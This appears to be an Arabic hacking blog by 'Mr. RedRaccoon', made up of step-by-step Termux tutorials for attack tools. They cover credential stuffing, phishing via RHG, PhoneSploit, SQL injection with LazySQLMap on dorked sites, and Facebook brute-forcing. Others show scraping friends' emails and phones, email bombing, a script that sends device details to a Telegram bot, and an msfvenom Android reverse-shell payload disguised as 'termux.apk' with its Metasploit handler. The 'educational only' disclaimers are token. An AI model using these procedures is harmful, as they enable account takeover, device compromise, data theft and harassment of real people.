Mr. RedRaccoon

Mr.  RedRaccoon ما هو Credential Stuffing Credential Stuffing هو هجوم إلكتروني يستخدمه المتسللون للوصول إلى الحسابات باستخدام بيانات اعتماد مسروقة. يعتمد الهجوم على أدوات تلقائية تقوم بمحاولة تسجيل الدخول إلى حسابات باستخدام كلمات مرور أو بيانات مسربة. خطوات الهجوم: التحقق مما إذا كان البريد الإلكتروني المستهدف قد تسربت بياناته ، ثم يتم استخدام كلمة المرور المسربة للتحقق من صحة الدخول إلى المواقع. التحقق مما إذا كانت بيانات الاعتماد المستخدمة على مواقع أخرى ، وذلك لفحص إمكانية إعادة استخدام نفس كلمة المرور. التحقق مما إذا كانت كلمة المرور القديمة المسربة ما زالت مستخدمة في أي موقع آخر. أداة Cr3dOv3r Cr3dOv3r هي أداة مفتوحة المصدر مصممة للمساعدة في تنفيذ مثل هذه الفحوصات. رابط المشروع: Cr3dOv3r على GitHub كيفية الاستخدام يمكن استخدام الأداة للتحقق من البريد الإلكتروني أو اسم المستخدم: usage: Cr3d0v3r.py [-h] [-p] [-np] [-q] email email : البريد الإلكتروني أو اسم المستخدم للتحقق منه. الخيارات الإضافية: -h, --help : عرض المساعدة والخروج. -p : لا تتحقق من التسريبات أو كلمات المرور بال...

Mr.  RedRaccoon 🔒 أداة RHG لاختراق الحسابات عبر الهندسة الاجتماعية 🔒 مقدمة : الهندسة الاجتماعية تُعد من أخطر الأساليب المستخدمة في اختراق الحسابات، حيث يتم خداع الأفراد للوصول إلى معلومات حساسة. أداة RHG مصممة لتوفير بيئة اختبار لأمان الحسابات باستخدام تقنيات الهندسة الاجتماعية، مما يتيح للمختصين اكتشاف الثغرات وسدها. أهمية الأداة : تم تطوير أداة RHG من قبل مختصين في الأمن السيبراني لمساعدة الباحثين ومسؤولي الأمان في محاكاة هجمات الهندسة الاجتماعية لتحديد نقاط الضعف وتحسين الحماية ضد هذا النوع من التهديدات. خطوات تثبيت واستخدام أداة RHG: تحديث الحزم الأساسية : قبل البدء، تأكد من تحديث الحزم الأساسية في نظام Termux: $ pkg update && pkg upgrade $ pkg install git $ pkg install python2 تحميل أداة RHG : لتحميل الأداة، استخدم الأمر التالي: $ git clone https://github.com/RAYANEHACKER/RHG_T.git الولوج إلى مجلد الأداة : بعد التحميل، ادخل إلى مجلد الأداة باستخدام الأوامر التالية: $ cd RHG_T $ chmod +x * $ python2 RHG.pyc فحص الأدوات المفقودة : لتثبيت الأدوات اللازمة للعمل بشكل...

Mr.  RedRaccoon الخطوة الأولى: تثبيت Termux قم بتثبيت تطبيق Termux من متجر التطبيقات على جهاز الأندرويد الخاص بك. يمكنك أيضًا استخدام توزيعات Linux مثل Kali Linux إذا كنت تفضل العمل على نظام تشغيل آخر. الخطوة الثانية: تثبيت الأدوات على Termux أو Linux افتح تطبيق Termux أو واجهة سطر الأوامر في توزيعة Linux الخاصة بك. نفّذ الأوامر التالية لتحديث الحزم وتثبيت الأدوات: $ apt update && apt upgrade $ pkg install python $ git clone https://github.com/Ledear-Hacker/RHG $ cd RHG $ ls $ chmod +x * $ python2 RHG.py الخطوة الثالثة: إعداد الأداة بعد الدخول إلى الأداة، اختر الخيار 1 لتثبيت جميع الأدوات دفعة واحدة بسهولة وبدون مشاكل. ملحوظة : تأكد من أنك تستخدم هذه الأدوات فقط لأغراض تعليمية وبحوث الأمن السيبراني، ويجب تجنب استخدامها لأي نشاط غير مشروع.

Mr.  RedRaccoon آلية عمل السكربت: استيراد المكتبات: يتم استيراد المكتبات اللازمة مثل os , sys , platform , socket , requests , و datetime . تعريف المتغيرات: TOKEN : رمز البوت الخاص بك على تيليجرام. ID : معرف تيليجرام الخاص بك. OS_Name : اسم نظام التشغيل. OS_Version : إصدار نظام التشغيل. Path : المسار الحالي. Time : الوقت الحالي. Ip : عنوان IP للجهاز. host : اسم المضيف. Dev : اسم المطور (يمكن تغييره). TOKEN = "Your BOT Token" ID = "Your Telegram Id" OS_Name = platform.system() OS_Version = platform.release() Path = sys.path[ 0 ] Time = str (datetime.now()) Ip = requests.get( "https://api.ipify.org" ).text host = socket.gethostbyname(socket.gethostname()) Dev = "@MrRedRaccon" إرسال المعلومات إلى تيليجرام: يتم إنشاء رابط لإرسال رسائل تيليجرام باستخدام TOKEN ، ويتم إنشاء قاموس يحتوي على معلومات حول نظام التشغيل والجهاز والوقت والمسار الحالي. يتم إرسال هذه المعلومات إلى حساب تيليجرام باستخدام API من خلال طلب POST. Url = "https://api.telegram.org/...

Mr.  RedRaccoon الخطوة الأولى: تثبيت Termux قم بتثبيت تطبيق Termux من متجر Google Play أو من أي مصدر موثوق لتطبيقات Android. الخطوة الثانية: تثبيت الأدوات اللازمة تثبيت Termux-ADB: افتح Termux وأدخل الأوامر التالية: $ git clone https://github.com/MasterDevX/Termux-ADB $ ls $ cd Termux-ADB $ ls $ chmod +x * $ ./InstallTools.sh تثبيت PhoneSploit: افتح نافذة جديدة في Termux وأدخل الأوامر التالية: $ git clone https://github.com/Zucccs/PhoneSploit $ cd PhoneSploit $ chmod +x * $ pip2 install colorama $ python2 main_linux.py باتباع هذه الخطوات، يمكنك إعداد الأدوات اللازمة لاختراق الهاتف المتصل بنفس الشبكة. تأكد من استخدام هذه الأدوات لأغراض تعليمية وأخلاقية فقط.

Mr.  RedRaccoon الخطوة الأولى: تحديث النظام وتثبيت الأدوات اللازمة تحديث النظام وتثبيت الأدوات: افتح Termux وأدخل الأوامر التالية: $ apt update && apt upgrade $ pkg install python2 $ pkg install git تثبيت Termux-LazySQLMap: أدخل الأوامر التالية لتثبيت الأداة: $ git clone https://github.com/verluchie/termux-lazysqlmap $ cd termux-lazysqlmap $ chmod 777 install.sh $ ./install.sh الخطوة الثانية: استخدام Google Dorks للعثور على مواقع الويب استخدم Google Dorks للعثور على مواقع الويب الضعيفة التي يمكنك اختبارها. (لمزيد من المعلومات حول Google Dorks، يمكنك البحث عن كيفية استخدامها). الخطوة الثالثة: تنفيذ الاختراق باستخدام Termux-LazySQLMap تشغيل الأداة: بعد تثبيت Termux-LazySQLMap، ابدأ الأداة بكتابة الأمر التالي في Termux: $ lazysqlmap اختيار الموقع المستهدف: أدخل عنوان الموقع الذي تريد اختراقه عندما يُطلب منك ذلك. اختيار خيارات التحقق: اختر الخيار المناسب لك. على سبيل المثال، اختر الخيار الذي يعود بالجداول في قاعدة البيانات. استرجاع الجداول: استخدم الأمر sitedb لاسترجاع الجد...

Mr.  RedRaccoon 1. إنشاء Payload ملغم باستخدام msfvenom: افتح Termux أو أي بيئة تشغيل تتيح لك تنفيذ الأوامر، ثم استخدم الأمر التالي لإنشاء Payload ملغم: msfvenom -p android/meterpreter/reverse_tcp LHOST=(Your IP) LPORT=(Your Port) R > /sdcard/termux.apk استبدل (Your IP) بعنوان IP الخاص بك. استبدل (Your Port) بالمنفذ الذي ترغب في استخدامه. 2. فتح Metasploit: بعد إنشاء الـ Payload، افتح Metasploit باستخدام الأمر: ./msfconsole 3. إعداد Metasploit لاستقبال الـ Payload: في Metasploit، اتبع الأوامر التالية: use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost (Your IP) set lport (Your Port) run استبدل (Your IP) بعنوان IP الخاص بك. استبدل (Your Port) بالمنفذ الذي اخترته. 4. استخدام Metasploit للتحكم بالجهاز المخترق: بمجرد اتصال الـ Payload بالجهاز، يمكنك استخدام الأوامر التالية للتحكم بالجهاز: help # عرض قائمة بالأوامر المتاحة shell # فتح قشرة النظام (Shell) cd /sdcard # تغيير الدليل إلى /sdcard ls # عرض محتويات الدليل ...

Mr.  RedRaccoon ملاحظة: يجب أن تكون على علم بأن استخدام الأدوات والبرمجيات لاختراق الحسابات بدون إذن هو غير قانوني وغير أخلاقي. الهدف من هذا الشرح هو توضيح كيفية عمل الأدوات لأغراض تعليمية فقط. يجب عليك دائمًا احترام خصوصية الآخرين والامتثال للقوانين المحلية. إليك خطوات استخدام Termux لاختراق حساب فيسبوك عبر التخمين: تحديث النظام وتثبيت الأدوات الأساسية: افتح Termux واستخدم الأوامر التالية لتحديث النظام وتثبيت الأدوات المطلوبة: apt update && apt upgrade $ $ pkg install git $ pkg install python $ pkg install python2 تثبيت سكربت التخمين: قم بتحميل السكربت من GitHub باستخدام الأوامر التالية: $git clone https://github.com/hackermohamedPro/Aliens-fb $ $ cd Aliens-fb $ pip2 install mechanize إنشاء قائمة كلمات المرور: قم بتشغيل السكربت لإنشاء قائمة كلمات مرور: $python Aliens-list.py عند تشغيل السكربت، سيُطلب منك إدخال اسم لقائمة كلمات المرور، تأكد من استخدام تنسيق .txt مثل passwords.txt . املأ القائمة بكلمات المرور المحتملة، ثم اكتب Pro واضغط على Enter . تشغيل أداة التخمين: ...

Mr.  RedRaccoon تنبيه: عملية تثبيت صلاحيات الروت (root) على جهاز Android قد تتسبب في فقدان الضمان أو حدوث مشاكل في النظام. تأكد من أنك تفهم المخاطر المرتبطة وأنك تقوم بذلك على مسؤوليتك الخاصة. الخطوات: تحديث النظام وتثبيت الأدوات الأساسية: افتح Termux واستخدم الأوامر التالية لتحديث النظام وتثبيت الأدوات اللازمة: apt update $ apt upgrade $ pkg install git $ pkg install ncurses-utils $ استنساخ مستودع termux-sudo من GitHub: git clone https://github.com/st42/termux-sudo $ الانتقال إلى مجلد termux-sudo: cd termux-sudo $ نسخ ملف sudo إلى المسار الصحيح: cat sudo > /data/data/com.termux/files/usr/bin/sudo $ تغيير صلاحيات الملف ليكون قابلاً للتنفيذ: chmod 700 /data/data/com.termux/files/usr/bin/sudo $ تشغيل الأمر sudo لاختبار التثبيت: sudo $ إذا تم تنفيذ الأمر بنجاح، فهذا يعني أن sudo تم تثبيته بشكل صحيح. ملاحظات: صلاحيات الروت في Termux تعتمد على أن يكون جهازك قد حصل على صلاحيات الروت مسبقًا. إذا لم يكن جهازك مروّتًا، فإن هذه الخطوات لن تعطيك صلاحيات الروت. تأمين الجهاز : تأكد ...

Mr.  RedRaccoon NucleiScanner هي أداة أتمتة تجمع بين وظائف Nuclei، Subfinder، Gauplus، Paramspider و httpx لتعزيز اختبار أما تطبيقات الويب. تستخدم Subfinder لجمع أسماء النطاقات الفرعية، وGauplus لجمع عناوين URL وتصفيتها، وParamSpider لتحديد نقاط الدخول المحتملة، وأخيرًا تستخدم Nuclei لعمل مسح باستخدام القوالب للكشف عن الثغرات الأمنية. تهدف NucleiScanner إلى تبسيط العملية، مما يجعلها أسهل بالنسبة للمتخصصين في الأمان ومطوري الويب للكشف عن المخاطر الأمنية ومعالجتها بكفاءة. قم بتحميل NucleiScanner لحماية تطبيقات الويب الخاصة بك من الثغرات والهجمات. رابط تحميل:  NucleiScanner: GitHub - NucleiScanner

Mr.  RedRaccoon كالي لينكس (Kali Linux) هي توزيعة لينكس مبنية على ديبيان، ومخصصة بشكل رئيسي للأمن والحماية المعلوماتية واختبار الاختراق. تم الإعلان عن إصدارها الأول في 13 مارس 2013. تُعتبر كالي لينكس أداة قوية في مجال الأمن السيبراني وتستخدم على نطاق واسع من قبل المحترفين في هذا المجال. أدوات كالي لينكس: تحتوي توزيعة كالي لينكس على مجموعة واسعة من الأدوات المخصصة لاختبار الاختراق والأمن السيبراني، ومن بين هذه الأدوات: Nmap: أداة قوية للمسح الأمني للمنافذ. Wireshark: برنامج لتحليل الحزم المتبادلة على الشبكات. John the Ripper: أداة لكسر كلمات المرور. Aircrack-ng: طقم برامج لاختبار اختراق الشبكات المحلية اللاسلكية (Wireless LANs). Burp Suite: أداة لفحص سلامة تطبيقات الويب. OWASP ZAP: أداة لفحص أمان تطبيقات الويب. بالإضافة إلى العديد من الأدوات الأخرى التي تساعد في إجراء اختبارات أمنية متعددة. برمجيات كالي لينكس: برمجيات حرة ومفتوحة المصدر: كالي لينكس تضم برمجيات حرة ومفتوحة المصدر تتوافق مع مبادئ البرمجيات الحرة. التثبيت والتشغيل: يمكن للمستخدمين تشغيل كالي لينكس كقرص حي (Liv...

Mr.  RedRaccoon Termux هو تطبيق يوفر بيئة سطر الأوامر على أجهزة الأندرويد، مما يتيح لك تنفيذ أوامر لينكس والتفاعل مع نظام الملفات. فيما يلي الأساسيات والأوامر الأساسية التي تحتاج إلى معرفتها لاستخدام Termux بكفاءة: أساسيات الأوامر في Termux: تثبيت الأدوات: الطريقة الأولى: لتثبيت أي أداة، استخدم الأمر: $ pkg install اسم_الأداة الطريقة الثانية: يمكنك تثبيت الأداة من مستودع GitHub باستخدام: $ git clone رابط_الأداة حذف الأداة: لحذف أي أداة أو مجلد، استخدم الأمر: $ rm -rf اسم_الأداة نسخ الأداة أو الملف: لنسخ ملف أو أداة إلى موقع آخر، استخدم: $ cp -a "الملف" / "الوجهة" نقل الأداة أو الملف: لنقل ملف أو أداة إلى موقع آخر، استخدم: $ mv -v "اسم_الملف" / "الوجهة" فتح قائمة الأدوات أو الملفات: لعرض محتويات الدليل الحالي، استخدم: $ ls فتح مجلد أو أداة: لدخول مجلد، استخدم: $ cd اسم_المجلد الخروج من مجلد: للخروج من المجلد الحالي، استخدم: $ cd .. مسح الشاشة: لمسح النصوص السابقة من الشاشة، استخدم: $ clear الخروج من Termux: للخروج من نافذة Termux، استخد...

Mr.  RedRaccoon 1. التثبيت: اتبع الخطوات التالية لتثبيت أداة OSIF على Termux: تثبيت الحزم المطلوبة: $ pkg install python2-dev python2 git -y تنزيل أداة OSIF: $   git clone https://github.com/ciku370/OSIF الدخول إلى مجلد الأداة: $ cd OSIF تثبيت المتطلبات: $ pip2 install -r requirements.txt إعطاء صلاحيات التنفيذ للملف: $ chmod +x osif.py تشغيل الأداة: $ python2 osif.py 2. الاستخدام: تسجيل الدخول: بعد تشغيل الأداة، اكتب الأمر التالي لتسجيل الدخول إلى حساب فيسبوك الخاص بك: $ token ستطلب منك الأداة إدخال البريد الإلكتروني وكلمة المرور. قم بإدخالهما. جمع البيانات: بعد تسجيل الدخول، استخدم الأمر التالي لتشغيل الأداة: $ python2 osif.py لجمع البيانات، استخدم الأوامر التالية: لجمع بيانات الأصدقاء على فيسبوك: $ get_data لجمع عناوين البريد الإلكتروني لأصدقائك: $ dump_mail لجمع أرقام الهواتف لأصدقائك: $ dump_phone ملاحظات: تأكد من أنك قد قمت بتثبيت جميع الحزم اللازمة بنجاح قبل تشغيل الأداة. تأكد من احترام القوانين وحقوق الأفراد عند استخدام الأداة. إذا واجهت أي مشاكل أثناء التثبيت أو الا...

Mr.  RedRaccoon 1. التحقق من تثبيت Python: تأكد من أن Python مثبت على جهازك قبل البدء في تثبيت الأداة. 2. استخدام بيئة افتراضية (Virtualenv): يُفضل استخدام بيئة افتراضية للحفاظ على بيئة Python منفصلة وتجنب تعارضات الحزم. تثبيت Virtualenv: $ pip install virtualenv 3. إنشاء بيئة افتراضية جديدة: يمكنك إنشاء بيئة افتراضية باسم تريده: $ virtualenv pocsuite يمكنك استبدال pocsuite بأي اسم تختاره. 4. تنشيط البيئة الافتراضية: لنظام Windows: $ pocsuite\Scripts\activate لنظام Linux/Mac: $ source pocsuite/bin/activate بعد تنفيذ الأمر المناسب لنظامك، ستلاحظ أن البيئة قد تم تفعيلها بنجاح. 5. تثبيت Pocsuite3: قم بتثبيت الأداة باستخدام pip: $ pip install pocsuite3 ستقوم هذه العملية بتحميل وتثبيت Pocsuite3 وجميع المكتبات المطلوبة تلقائيًا. 6. بدء استخدام Pocsuite3: لاختبار أحد تطبيقات الويب، استخدم الأمر التالي: $ pocsuite -r [poc_file] -u [url] استبدل [poc_file] بمسار ملف الـ POC الخاص بك و [url] بعنوان الهدف الذي تريد اختباره. شرح الأداة: لمزيد من المعلومات حول استخدام الأداة، يمكنك مشاهدة ال...

Mr.  RedRaccoon في عصر الابتكار التكنولوجي، يلتزم الباحثون والمحترفون في مجال أمان المعلومات بالبحث عن أدوات فعّالة تسهم في اكتشاف الثغرات وتحسين أمان النظم. إحدى هذه الأدوات الرائدة هي Pocsuite3، والتي تأتي بأسلوب حيوي لتحقيق الأمان بشكل مبتكر. Pocsuite3: أداة التصدي للثغرات بشكل متقدم Pocsuite3 هي أداة متقدمة في مجال اكتشاف الثغرات، وتبرز بفعاليتها العالية وسهولة استخدامها. تم تطويرها لتلبية احتياجات المتخصصين في أمان المعلومات الذين يسعون لتحسين أمان النظم وتقوية خطوط الدفاع السيبرانية. ميزات رائدة في مجال الأمان: اكتشاف تلقائي: Pocsuite3 تأتي مع قدرة فائقة في اكتشاف التهديدات تلقائيًا، مما يسهل على المستخدمين العثور على الثغرات دون جهد زائد. تحليل شامل: تقدم الأداة تحليلًا شاملاً للثغرات المكتشفة، مما يساعد في تحديد وفهم جميع جوانب الهجوم المحتملة. دعم للثغرات المتقدمة: تستهدف Pocsuite3 ليس فقط الثغرات الأساسية ولكن أيضًا الثغرات المتقدمة، مما يجعلها أداة قوية ومتعددة الاستخدامات. سهولة الاستخدام: بفضل واجهة المستخدم البسيطة والواضحة، يمكن للمستخدمين بسهولة الاستفادة من قوة...

Mr.  RedRaccoon مواصفات الأداة: تتيح الأداة إرسال رسائل مزعجة إلى عناوين البريد الإلكتروني. يمكن استخدامها لتوليد الرسائل المزعجة وإرسالها عبر خدمات البريد الإلكتروني مثل Gmail وYahoo وHotmail. شرح التثبيت: تحديث النظام وترقية الحزم: $ apt update && apt upgrade تثبيت Git: $ pkg install git تثبيت Python 2: $ pkg install python2 استنساخ مستودع الأداة من GitHub: $ git clone https://github.com/sumanmanna6111/Emailboom الانتقال إلى مجلد الأداة: $ cd Emailboom عرض محتويات المجلد للتأكد من وجود الملفات: $ ls منح صلاحيات التنفيذ للملف EmBomber.py : $ chmod +x EmBomber.py تشغيل الأداة: $ python2 EmBomber.py الآن، اختر نوع البريد الإلكتروني المطلوب: Gmail Yahoo Hotmail